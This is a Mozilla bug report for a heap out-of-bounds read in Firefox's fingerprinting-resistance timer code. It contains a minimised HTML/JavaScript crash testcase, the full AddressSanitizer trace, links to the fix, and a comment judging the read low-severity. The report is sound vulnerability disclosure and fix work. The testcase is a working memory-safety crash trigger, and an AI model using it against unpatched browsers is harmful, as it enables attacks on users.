1442984 - heap out of bounds read in mozilla::nsRFPService::RandomMidpoint

Status: RESOLVED FIXED

(Core :: DOM: Core & HTML, defect)

Description

[Nils]

Attachment: crash.html (minimised testcase)

The following testcase crashes the latest ASAN build of Firefox 60.0a1 () when loaded from a HTTP server.

crash.html:
<script>
function start() {
	o25=document.createElementNS('http://www.w3.org/1999/xhtml','audio');
	document.documentElement.appendChild(o25);
	o53=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o53.src='doesnt_exist.svg';
	window.top.document.body.appendChild(o53);
	o25.parentNode.insertBefore(o25.previousSibling,o25.nextSibling);
	o76=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o76.src='doesnt_exist.svg';
	window.top.document.body.appendChild(o76);
	o127=window.top.frames[1];
	o128=o127.document;
	o217=o128.createElementNS('http://www.w3.org/1999/xhtml','li');
	o217.appendChild(o53);
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==31598==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000248654 at pc 0x7f3ff16ac72f bp 0x7ffe4e31b070 sp 0x7ffe4e31b068
READ of size 4 at 0x606000248654 thread T0 (Web Content)
    #0 0x7f3ff16ac72e in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:416:41
    #1 0x7f3ff16ad7da in mozilla::nsRFPService::ReduceTimePrecisionImpl(double, mozilla::nsRFPService::TimeScale, double, mozilla::TimerPrecisionType) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:489:9
    #2 0x7f3fed13023f in mozilla::dom::PerformanceResourceTiming::StartTime() const /builds/worker/workspace/build/src/dom/performance/PerformanceResourceTiming.cpp:51:18
    #3 0x7f3fed11cf99 in LessThan /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/PerformanceEntry.h:115:42
    #4 0x7f3fed11cf99 in operator()<RefPtr<mozilla::dom::PerformanceEntry> > /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:803
    #5 0x7f3fed11cf99 in BinarySearchIf<nsTArray_Impl<RefPtr<mozilla::dom::PerformanceEntry>, nsTArrayInfallibleAllocator>, detail::ItemComparatorFirstElementGT<mozilla::dom::PerformanceEntry *&, mozilla::dom::PerformanceEntryComparator> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/BinarySearch.h:80
    #6 0x7f3fed11cf99 in IndexOfFirstElementGt<mozilla::dom::PerformanceEntry *&, mozilla::dom::PerformanceEntryComparator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1538
    #7 0x7f3fed11cf99 in RefPtr<mozilla::dom::PerformanceEntry>* nsTArray_Impl<RefPtr<mozilla::dom::PerformanceEntry>, nsTArrayInfallibleAllocator>::InsertElementSorted<mozilla::dom::PerformanceEntry*&, mozilla::dom::PerformanceEntryComparator, nsTArrayInfallibleAllocator>(mozilla::dom::PerformanceEntry*&, mozilla::dom::PerformanceEntryComparator const&) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1557
    #8 0x7f3fed121f20 in InsertResourceEntry /builds/worker/workspace/build/src/dom/performance/Performance.cpp:411:20
    #9 0x7f3fed121f20 in mozilla::dom::PerformanceMainThread::AddEntry(nsIHttpChannel*, nsITimedChannel*) /builds/worker/workspace/build/src/dom/performance/PerformanceMainThread.cpp:138
    #10 0x7f3fe644f3b9 in mozilla::net::HttpChannelChild::DoPreOnStopRequest(nsresult) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1222:27
    #11 0x7f3fe6459b37 in mozilla::net::HttpChannelChild::OnStopRequest(nsresult const&, mozilla::net::ResourceTimingStruct const&, mozilla::net::nsHttpHeaderArray const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1160:3
    #12 0x7f3fe6668d00 in mozilla::net::ChannelEventQueue::FlushQueue() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:93:12
    #13 0x7f3fe66732fe in MaybeFlushQueue /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:329:5
    #14 0x7f3fe66732fe in CompleteResume /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:306
    #15 0x7f3fe66732fe in mozilla::net::ChannelEventQueue::ResumeInternal()::CompleteResumeRunnable::Run() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:161
    #16 0x7f3fe59bc4a0 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25
    #17 0x7f3fe59e4a84 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #18 0x7f3fe5a00a40 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #19 0x7f3fe68be05a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #20 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #21 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #22 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #23 0x7f3fed43f08a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #24 0x7f3ff18d29fb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:892:22
    #25 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #26 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #27 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #28 0x7f3ff18d23da in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:718:34
    #29 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #30 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #31 0x7f4004eaa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #32 0x420f48 in _start (/fuzzer3/firefox/firefox+0x420f48)

0x606000248654 is located 12 bytes to the left of 64-byte region [0x606000248660,0x6060002486a0)
allocated by thread T0 (Web Content) here:
    #0 0x4c1c93 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7f3fe5815281 in Alloc /builds/worker/workspace/build/src/xpcom/string/nsSubstring.cpp:257:22
    #2 0x7f3fe5815281 in nsTSubstring<char>::MutatePrep(unsigned int, char**, mozilla::detail::StringDataFlags*) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:166
    #3 0x7f3fe582768b in nsTSubstring<char>::ReplacePrepInternal(unsigned int, unsigned int, unsigned int, unsigned int) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:229:8
    #4 0x7f3fe5823ff8 in nsTSubstring<char>::Assign(char const*, unsigned int, std::nothrow_t const&) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:390:8
    #5 0x7f3fe5811217 in nsTSubstring<char>::Assign(char const*, unsigned int) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:366:8
    #6 0x7f3ff12c2a16 in nsCryptoHash::Finish(bool, nsTSubstring<char>&) /builds/worker/workspace/build/src/security/manager/ssl/nsCryptoHash.cpp:190:11
    #7 0x7f3ff16abf41 in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:405:19
    #8 0x7f3ff16ad7da in mozilla::nsRFPService::ReduceTimePrecisionImpl(double, mozilla::nsRFPService::TimeScale, double, mozilla::TimerPrecisionType) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:489:9
    #9 0x7f3fed133a2e in mozilla::dom::PerformanceTimingData::PerformanceTimingData(nsITimedChannel*, nsIHttpChannel*, double) /builds/worker/workspace/build/src/dom/performance/PerformanceTiming.cpp:116:15
    #10 0x7f3fed1227f9 in mozilla::dom::PerformanceTimingData::Create(nsITimedChannel*, nsIHttpChannel*, double, nsTSubstring<char16_t>&, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/dom/performance/PerformanceTiming.cpp:72:14
    #11 0x7f3fed121dd2 in mozilla::dom::PerformanceMainThread::AddEntry(nsIHttpChannel*, nsITimedChannel*) /builds/worker/workspace/build/src/dom/performance/PerformanceMainThread.cpp:125:5
    #12 0x7f3fe644f3b9 in mozilla::net::HttpChannelChild::DoPreOnStopRequest(nsresult) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1222:27
    #13 0x7f3fe6459b37 in mozilla::net::HttpChannelChild::OnStopRequest(nsresult const&, mozilla::net::ResourceTimingStruct const&, mozilla::net::nsHttpHeaderArray const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1160:3
    #14 0x7f3fe6668d00 in mozilla::net::ChannelEventQueue::FlushQueue() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:93:12
    #15 0x7f3fe66732fe in MaybeFlushQueue /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:329:5
    #16 0x7f3fe66732fe in CompleteResume /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:306
    #17 0x7f3fe66732fe in mozilla::net::ChannelEventQueue::ResumeInternal()::CompleteResumeRunnable::Run() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:161
    #18 0x7f3fe59bc4a0 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25
    #19 0x7f3fe59e4a84 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #20 0x7f3fe5a00a40 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #21 0x7f3fe68be05a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #22 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f3fed43f08a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #26 0x7f3ff18d29fb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:892:22
    #27 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #28 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #29 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #30 0x7f3ff18d23da in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:718:34
    #31 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #32 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #33 0x7f4004eaa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:416:41 in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*)
Shadow bytes around the buggy address:
  0x0c0c80041070: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c80041080: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c0c80041090: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0c800410a0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c800410b0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
=>0x0c0c800410c0: 00 00 00 00 00 00 00 00 fa fa[fa]fa 00 00 00 00
  0x0c0c800410d0: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0c800410e0: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0c800410f0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c0c80041100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c80041110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==31598==ABORTING

Comment 1

[Nils]

Attachment: ASAN output

Comment 3

[Tom Ritter [:tjr] (OOTO until 4/30 at least)]

I think the title was a typo?

Comment 4

[Tom Ritter [:tjr] (OOTO until 4/30 at least)]

Attachment: 1442984.patch

Comment 5

[Sebastian Hengst [:aryx] (needinfo me if it's about an intermittent or backout)]

https://hg.mozilla.org/integration/mozilla-inbound/rev/7376ba7d44f18b85ddbe0718498626d7165e9669

Comment 7

[Sebastian Hengst [:aryx] (needinfo me if it's about an intermittent or backout)]

https://hg.mozilla.org/mozilla-central/rev/7376ba7d44f1

Comment 8

[Daniel Veditz [:dveditz]]

Although out of bounds, what we're reading here is a numeric value that is used in a time calculation. We may end up with incorrect time fuzziness (maybe even time going backwards? Is that double-checked later or assumed good from the array?) but doesn't seem worse than that.